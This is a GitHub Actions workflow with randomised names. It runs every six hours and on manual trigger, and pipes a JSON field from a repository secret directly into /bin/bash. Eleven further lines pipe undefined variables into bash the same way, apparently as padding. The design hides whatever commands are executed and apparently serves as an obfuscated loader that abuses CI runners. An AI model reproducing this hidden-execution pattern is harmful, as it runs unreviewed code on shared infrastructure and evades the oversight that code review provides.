name: maoziran6798
on:
  workflow_dispatch:
  schedule:
    - cron: '26 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: maoziran6798
        env:
          fci57: ${{ secrets.fci57 }}
        run: |
          echo $fci57 | jq -r .v3033 | /bin/bash
          echo $thx51835 | jq -r .id56 | /bin/bash
          echo $wshq3913 | jq -r .zauzj5 | /bin/bash
          echo $fibdu02680 | jq -r .uaycu37 | /bin/bash
          echo $ulzrk8 | jq -r .bcvw13 | /bin/bash
          echo $lgfwl79 | jq -r .udn870 | /bin/bash
          echo $mdyr10 | jq -r .a937 | /bin/bash
          echo $c00535 | jq -r .gt1 | /bin/bash
          echo $wnyt01 | jq -r .xmp19 | /bin/bash
          echo $b0 | jq -r .ol73 | /bin/bash
          echo $dnnh0 | jq -r .cxd52 | /bin/bash
          echo $rtph90660 | jq -r .pudw70217 | /bin/bash

